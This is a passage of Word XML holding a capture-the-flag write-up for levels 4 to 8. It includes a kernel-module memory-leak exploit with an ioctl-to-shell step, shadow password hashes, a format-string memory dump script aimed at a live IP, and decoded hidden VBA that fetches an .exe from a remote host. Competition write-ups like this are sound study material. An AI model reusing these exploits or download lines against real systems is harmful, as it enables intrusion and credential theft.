        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A65FD" w:rsidRDefault="000A65FD" w:rsidP="004502C1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>레벨4 풀이</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A65FD" w:rsidRDefault="000A65FD">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A65FD" w:rsidRDefault="000A65FD">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>복호화할 문자열이 구할 문자열과 같다고 가정했습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A65FD" w:rsidRDefault="000A65FD">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>일단 bbbbbbbbbbbbbbbbbbbbb로 모두 채우고</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A65FD" w:rsidRDefault="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">앞부터 </w:t>
      </w:r>
      <w:r w:rsidR="000A65FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하나하나씩 글자를 맞추어 나가서 아래와 같은 입력을 구했습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>구하는데 hexedit로 파일을 편집해 가면서 만들었습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A65FD" w:rsidRPr="00FD5356" w:rsidRDefault="000A65FD">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9224"/>
      </w:tblGrid>
      <w:tr w:rsidR="000A65FD" w:rsidTr="000A65FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9224" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FD5356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00000000   47 14 1D 28  55 17 42 63  5C 1F 5D 19  42 47 1E 1E  G..(U.Bc\.].BG..</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A65FD" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>00000010   2B 0E 13 52  4A 17 1D 1A  56 4B                     +..RJ...VK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>slug@slug:~/wow$ ./prog `printf "\x47\x14\x1D\x28\x55\x17\x42\x63\x5C\x1F\x5D\x19\x42\x47\x1E\x1E\x2B\x0E\x13\x52\x4A\x17\x1D\x1A\x56\x4B"`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E563A5" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>G(UBc\]BG+RJVK -&gt; fckorea-wowhacker-codegate</w:t>
      </w:r>
      <w:r>
        <w:cr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9242"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E563A5" w:rsidTr="00E563A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9224" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E563A5" w:rsidRPr="00E563A5" w:rsidRDefault="00E563A5" w:rsidP="00FD5356">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>\x47\x14\x1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r>
              <w:t>\x28\x55\x17\x42\x63\x5C\x1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>f</w:t>
            </w:r>
            <w:r>
              <w:t>\x5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r>
              <w:t>\x19\x42\x47\x1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r>
              <w:t>\x1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r>
              <w:t>\x2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:r>
              <w:t>\x0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r>
              <w:t>\x13\x52\x4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:t>\x17\x1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r>
              <w:t>\x1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:t>\x56\x4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E563A5" w:rsidRDefault="00E563A5" w:rsidP="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 그대로 MD5한 값을 인증했습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E563A5" w:rsidRDefault="00E563A5" w:rsidP="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E563A5" w:rsidRPr="00E563A5" w:rsidRDefault="00631465" w:rsidP="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 부분은</w:t>
      </w:r>
      <w:r w:rsidR="00E563A5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 문제 Description이 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>명확하지 않아서 인증하는데 많은 시간이 걸렸습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E563A5" w:rsidRPr="00EA24E2" w:rsidRDefault="00E563A5" w:rsidP="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A65FD" w:rsidRDefault="000A65FD" w:rsidP="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>레벨5풀이</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00FD5356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>level5 풀이입니다. 어떤 exe파일이 하나 주어집니다. 이 exe 파일을 실행하면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이상한</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 기괴음이 들리는 mp3 파일과 private.key가 사용자 PC에 생성됩니다.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왜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 이상한 기괴음이 들리냐면.. 암호화가 되있어서 그렇습니다. 문제 풀이의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목적은</w:t>
      </w:r>
      <w:r>
        <w:t>, 이 암호화된 mp3를 복호화하여 원래의 노래를 듣고, 이 노래가 바로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다음</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 레벨의 패스워드입니다!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우선</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> private.key를 조사해보니 rsa 키였습니다. 우선은 mp3안에 존재하는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이</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rsa 암호화 부분을 찾아서 decode하는 것이 첫번째 단계인거 같아 그 작업에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들어갔습니다</w:t>
      </w:r>
      <w:r>
        <w:t>.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>rsa 데이터를 임의로 암호화해보니 그 데이터가 아주 크지 않을 경우에는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디폴트로</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 128bytes 단위로 암호화 된다는 것을 파악했습니다. 그래서 우선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mp3 파일을 읽은 후 128 bytes 단위로 brute force를 시도했습니다.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>#include &lt;sys/types.h&gt;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#include &lt;sys/time.h&gt;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#include &lt;unistd.h&gt;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#include &lt;stdio.h&gt;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#include &lt;fcntl.h&gt;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#include &lt;sys/stat.h&gt;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#include &lt;errno.h&gt;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>int main(int argc, char *argv[])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{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FILE *fp;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FILE *fout;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int a, b, c;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int cur_offset;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int count;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cmd[256];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tmp[256];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misi[256];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buf[1024];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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        system("mkdir -p ./results2");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for(count=0;count&lt;=10000;count++)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{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printf("count - %d\n", count);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for(a=128;a&lt;=128;a++)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{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fp=fopen(argv[1], "rb");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fseek(fp, count, SEEK_SET);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memset(cmd, 0x00, sizeof(cmd));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sprintf(cmd, "./results2/%d_%d", count, a);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memset(buf, 0x00, sizeof(buf));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fread(buf, 1, a, fp);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fout=fopen(cmd, "wb");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fwrite(buf, 1, a, fout);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fclose(fout);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fclose(fp);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memset(tmp, 0x00, sizeof(tmp));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sprintf(tmp, "openssl rsautl -inkey key -decrypt -in %s -out %s_dec", cmd, cmd);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system(tmp);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unlink(cmd);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}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}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}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이렇게</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 해서 생성된 파일이 바로 The best security group. WoWHacker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값입니다</w:t>
      </w:r>
      <w:r>
        <w:t>.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힌트를</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 보니 이건 blowfish 알고리즘이겠더군요.. 처음엔 blowfish 알고리즘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lastRenderedPageBreak/>
        <w:t>공략하려고</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> openssl에 내장된 각종 blowfish 알고리즘을 동원해봤지만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실패했습니다</w:t>
      </w:r>
      <w:r>
        <w:t>.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여기서부터</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 진정한 삽질이 시작됐습니다. 정말로 삽질 많이하고 brute force를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각</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 암호화, xor 등등 적어도 천만번 이상은 한거 같은데 -_-; 도저히 답이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안나오더군요</w:t>
      </w:r>
      <w:r>
        <w:t>.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결국에</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> brute force를 포기하고 blowfish로 돌아가서, 일반적인 blowfish는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도대체</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 어떻게 진행되는걸까 한번 trace를 해봤습니다. 그랬더니 64bytes -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strlen("The best security group. WoWHacker")+1 부분이 이상한 값을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채워진</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 후에 복호화 과정이 진행되더군요.. 그 이상한 값은 0xcd였습니다.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사실</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mp3에도 0xcd라는 이상한 값이 계속 채워져있길래 이게 뭔가 했습니다.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이것이</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 출제자가 의도한 힌트인지 아닌지는 모르겠지만 속는셈치고 0xcd값을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채운</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 후에 복호화를 해보니.. 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>void bfdecrypt(unsigned char *keydata, int keydatalen, char *in, char *out, unsigned int inlen)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{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BF_KEY key;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unsigned char ivec[32];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int num=0;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BF_set_key(&amp;key, keydatalen, keydata);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memset(ivec, '\0', 32);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BF_cfb64_encrypt(in, out, inlen, &amp;key, ivec, &amp;num, BF_DECRYPT);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}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>main(int argc, char *argv[])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{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buf[1024]={0};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out[1024]={0};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pass[]="The best security group. WoWHacker";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cmd[256]={0};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FILE *fp;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int a, b, c, d;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int size;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int count;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int nFrameSize;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char kbuf[100]={0};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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        pFile=fopen("./music.mp3", "rb");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lol=0;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a=0;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fp=fopen("./new.mp3", "wb");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strcpy(kbuf, pass);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memset(kbuf+35, 0xcd, 29);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dumpcode((unsigned char *)kbuf, 64);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while(1)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{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a++;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b = lol;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whatthefuck(lol);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nFrameSize = (144000 * FrameBR / FrameSRF) + FramePADDING;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memset(buf, 0x00, sizeof(buf));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memset(out, 0x00, sizeof(out));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fseek(pFile, b, SEEK_SET);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fread(buf, 1, nFrameSize, pFile);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bfdecrypt(kbuf, 64, buf+4, out, nFrameSize-4);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if(a==0)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{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fwrite(buf, 1, nFrameSize, fp);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}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else if(a==1)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{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fwrite(buf, 1, nFrameSize, fp);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}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else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{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fwrite(buf, 1, 4, fp);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fwrite(out, 1, nFrameSize-4, fp);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}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lol += nFrameSize;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if(lol&gt;=5433869)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                exit(0);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 xml:space="preserve">        }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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        fclose(fp);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}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드디어</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 음악을 get할 수 있게 되었습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>감동의</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 도가니탕.. 노래 제목은 can't take my eyes off you, 즉 이게</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>다음</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 레벨 패스워드입니다. 꼭 한번 들어보시길..</w:t>
      </w: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Default="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>레벨 6 풀이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Level6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Level 6 is a lkm with a few vulnerabilities. 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The lkm implements functions for the "hkdev" character device.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Initially a few problems were noticed.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ssize_t write_a( struct file *filp, const char *buf, size_t count, loff_t *f_pos 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...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157:    set_fs(get_ds());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159:    if( count &gt; 8 )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160:            return -EFAULT;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162:    strcpy( data_rw , buf );</w:t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  <w:t>(1)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163:    data_rw[hk_strlen(data_rw) -1] = '\0';</w:t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  <w:t>(2) off-by-one underflow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164:    flag_rw++;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...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171:ssize_t read_a( struct file *filp, char *buf, size_t count, loff_t *f_pos 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175:    if( flag_rw &gt; 0 )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176:    {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177:            for( cnt = 0 ; cnt &lt; strlen(data_rw) -1 ; cnt++ )</w:t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  <w:t>(3) off by one with larger consequences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178:                    data_rw[cnt] = ((data_rw[cnt] &gt;&gt; table_rw[cnt]) ^ flag_rw) % (cnt +7);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179:    } flag_rw--;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181:    return 0;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...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320:ssize_t read_c( struct file *filp, char *buf, size_t count, loff_t *f_pos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332:    if( (filp-&gt;f_pos) != 0 )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333:            p = p +(filp-&gt;f_pos);</w:t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  <w:t>(4)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335:    if( (errn = copy_to_user( (void *)buf , (const void *)p , (unsigned long)count )) &lt; 0 )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336:            return errn;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We had no success in exploiting (1). data_rw is placed towards the end of the data region, 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and no pointers or other things to take control of execution were found. The overflow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ends up reaching unmapped memory with about 2000 bytes, trigger an Oops.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In fact, (1) was unintentional and was later patched to use strncpy.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No attempt was made with problem (3) because it overflows the same data as the strcpy. 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(4) is a memory leak that we discovered pretty early on, and turned out to be all we needed.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lastRenderedPageBreak/>
        <w:t>The global ioctl provides an authentication feature that drops the hk uid. There is no bounds checking,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an arbitrary amount of data can be read from memory. Multiple reads can be used to read more information.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43:char hk_password[] = "HK_KEY: this is a default password";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98:int ioctl_global_hk( struct inode *inode, struct file *filp, unsigned int cmd, unsigned long arg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...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101:    char *hkp = hk_password;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...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129:                    if( !hk_compare( plz.key , hkp +8 ) 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130:                    {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131:                            current-&gt;uid = current-&gt;euid = HK_ID;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132:                            current-&gt;gid = current-&gt;egid = HK_ID;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133:                    }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Exploiting the memory leak is easy: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==============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#include &lt;fcntl.h&gt;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#include &lt;stdio.h&gt;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int main(int argc, char *argv[])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{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int fd;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int i, j;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int sz;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char  *buf;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fd = open("/dev/hkdev", O_NONBLOCK | O_NDELAY, O_RDONLY);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sz = atoi(argv[1]);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buf = malloc(sz);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for (j = 0; j &lt; atoi(argv[2]); j++) {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  <w:t>fprintf(stderr, "%d\n", read(fd, buf, sz));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  <w:t>for (i = 0; i &lt; sz; i++) {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  <w:t>putchar(buf[i]);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</w:r>
      <w:r w:rsidRPr="00F44264">
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:cs="굴림"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>}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}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}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==============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Triggering the ioctl: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==============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#include &lt;fcntl.h&gt;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#include &lt;stdio.h&gt;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#define AUTH_HK -0x7f7f9500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main(int argc, char *argv[])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{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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44264">
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:cs="굴림"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>fd;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fd = open("/dev/hkdev", O_NONBLOCK | O_NDELAY, O_RDONLY);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ioctl(fd, AUTH_HK, argv[1]);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printf("%d\n", getuid());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ab/>
        <w:t>system("sh");</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:cs="굴림"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ko-KR"/>
        </w:rPr>
        <w:t>}</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:cs="굴림"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ko-KR"/>
        </w:rPr>
        <w:t>==============</w:t>
      </w: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./x 100000 10000 | strings | grep HK_KEY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x strings | grep HK_KEY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00 10000 | strings | grep HK_KEY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00 10000 | strings | grep HK_KEY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HK_KEY: linux kernel memory leak vulnerability is very frequent and famous.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char hk_password[] = "HK_KEY: linux kernel memory leak vulnerability is very frequent and famous.";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HK_KEY: linux kernel memory leak vulnerability is very frequent and famous.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HK_KEY: linux kernel memory leak vulnerability is very frequent and famous.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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:cs="굴림"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ko-KR"/>
        </w:rPr>
        <w:t>Authenticating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[sixsense@localhost .z2]$ ./g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500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sh-3.1$ id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uid=500(sixsense) gid=500(sixsense) groups=500(sixsense) context=user_u:system_r:unconfined_t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sh-3.1$ exit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[sixsense@localhost .z2]$ ./g "linux kernel memory leak vulnerability is very frequent and famous."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501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sh-3.1$ id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uid=501(hk) gid=501(hk) groups=500(sixsense) context=user_u:system_r:unconfined_t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Along with probably other teams we had this solved early on but the password file had not been updated,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so we tried our luck with the other vulnerabilities, specifically mmap. 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Hashes were also found but not cracked.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root:$1$lFBBaCVc$04rZ8mYd6aXVDqLIwTYiF1:13960:0:99999:7:::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sixsense:$1$YiP69CTQ$p9J.Ylj8J4HSHYAZo724N.:13960:0:99999:7:::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hk:$1$4yjezedj$TiHZEYy5CjiOsYlX5bwi60:13960:0:99999:7:::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pc:$1$PpfRz7r5$Q6HWXmoZIsCslIEkzeQ.//:13960:0:99999:7:::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o:$1$nZaB7Zv5$qi4c/ACyRIL6bLgIINuaJ.:13960:0:99999:7:::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hkpco:$1$p5rQbt.f$3r3Q3tx7m8AynLF0Yd/XH0:13960:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>레벨 7 풀이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----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Level 7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IP: 222.239.80.201 PORT: 22222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----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This level is a format string vulnerability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nc 222.239.80.201 22222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----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 %X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Sorry. Your value was BFE57042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%X is not the password.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.----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Since the goal is to get a password, we dumped the text segement first, where rodata is stored.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from socket import *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import struct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#aa\x01\x80\x04\x08%9$s\x00\x00"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for addr in range(0x8048000, 0x8058000):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        tmp = "aa"+struct.pack("&lt;L", addr) + "%9$s\x00\x00"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        print tmp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        clientsock = socket(AF_INET, SOCK_STREAM)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        clientsock.connect(('222.239.80.201', 22222))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        clientsock.send(tmp)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        data = clientsock.recv(1024)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 xml:space="preserve">        print data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--------------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Sorry. Your value was aaU~F^D^HNo1Hacker!!.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  <w:r w:rsidRPr="00F44264">
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:cs="굴림"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aaU~F^D^H%9$s is not the password.</w:t>
      </w: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P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</w:rPr>
      </w:pP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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:cs="굴림"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ko-KR"/>
        </w:rPr>
        <w:t>aaV~F^D^H%9$s^@^@</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:cs="굴림"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ko-KR"/>
        </w:rPr>
        <w:t>--------------</w:t>
      </w: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</w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:wordWrap/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:cs="굴림"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ko-KR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsid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F44264" w:rsidRPr="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E87EE3" w:rsidRDefault="00E87EE3" w:rsidP="004502C1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>레벨 8 풀이</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E87EE3" w:rsidRDefault="00E87EE3"/>
    <w:p w:rsidR="00E87EE3" w:rsidRDefault="00E87EE3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>홈페이지</w:t>
      </w:r>
      <w:r w:rsidR="00C03B05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 HTML코드를 보면</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C03B05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Encoding된 VBA 코드가</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 있</w:t>
      </w:r>
      <w:r w:rsidR="00C03B05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C03B05" w:rsidRPr="00C03B05" w:rsidRDefault="00C03B05"/>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이를 복호화 하면 아래와 같은 코드가 나옵니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C03B05" w:rsidRDefault="00C03B05"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9224"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C03B05" w:rsidTr="00C03B05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9224" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="00FD5356">
            <w:r>
              <w:t>slax = "http://222.239.80.206/w0whack3rs1axc0r3c0dega73/vin/c0d3ga73.exe"</w:t>
            </w:r>
          </w:p>
